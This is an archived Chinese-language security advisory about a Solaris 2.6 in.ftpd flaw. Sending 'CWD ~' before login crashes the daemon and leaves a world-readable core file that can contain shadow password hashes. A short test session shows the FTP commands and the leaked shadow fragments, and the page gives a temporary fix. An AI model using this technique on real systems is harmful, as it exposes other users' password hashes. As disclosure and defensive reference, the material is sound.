[ 永遠的UNIX > Solaris 2.6 IN.FTPD CWD 用戶名猜測漏洞 ]

[ 永遠的UNIX::UNIX技術資料的寶庫 ] GB | BIG5

首頁 > 安全技術 > 系統 > 正文

Solaris 2.6 IN.FTPD CWD 用戶名猜測漏洞

本文出自: 中國紅客聯盟 http://www.cnhonker.com (2001-06-01 09:04:00)

受影響的系統:
Solaris 2.6/2.5以及更低版本 (SPARC, x86)
描述:
--------------------------------------------------------------------------------

Solaris 的in.ftpd在用戶登陸前接收到一個'CWD ~'請求時，會將用戶
的home目錄拷貝到一個緩沖區中。然而用戶沒有登陸前，這個home指針
為空。這將造成一個段訪問錯誤發生，ftpd會在系統根目錄下產生一個
core文件。這個core文件中可能包含shadow文件的部分內容。

缺省情況下，在Solaris 2.6下，core文件是任何人可讀的。
所以普通用戶可以獲取部分或者全部的用戶口令密文。

在Solaris 7/8下，缺省core文件是其他人不可讀取得，所以不會造成
安全問題。

<*來源：Johnny Cyberpunk (johncybpk@gmx.net) *>

測試程序：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

warning3 (warning3@nsfocus.com)提供了下列測試方法：

[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r--   1 root     root      284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /coremore
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]

--------------------------------------------------------------------------------
建議:

臨時解決方法：

建議您禁止產生core或者通過設置umask使core文件不可讀

廠商補丁：
暫無。

(http://www.fanqiang.com)     進入【UNIX論壇】

相關文章

Java源碼：實現簡單的FTP功能 (2002-01-03 08:10:00)
如何以Solaris架設FTP虛擬系統 (2001-11-01 08:00:01)
ProFtpd快速指南 (2001-10-20 09:05:00)
solaris下匿名FTP安裝 (2001-10-02 10:00:00)
遠程連接(telnet/ftp/rsh/ssh)作為root的用法和總結 (2001-09-02 13:05:00)
如何使用wu-ftp 2.x(site exec bug)來取得root權限 (2001-07-15 07:05:00)
proFTP中如何將用戶限制在自己的home目錄下？ (2001-07-09 22:09:22)
如何配置WU-FTP服務器 (2001-06-27 08:10:01)
wu-ftpd使用基礎 (2001-06-27 07:00:00)
ftp將用戶限制在自己目錄下的方法 (2001-06-26 13:04:00)

===更多相關===

★ 樊強制作歡迎分享 ★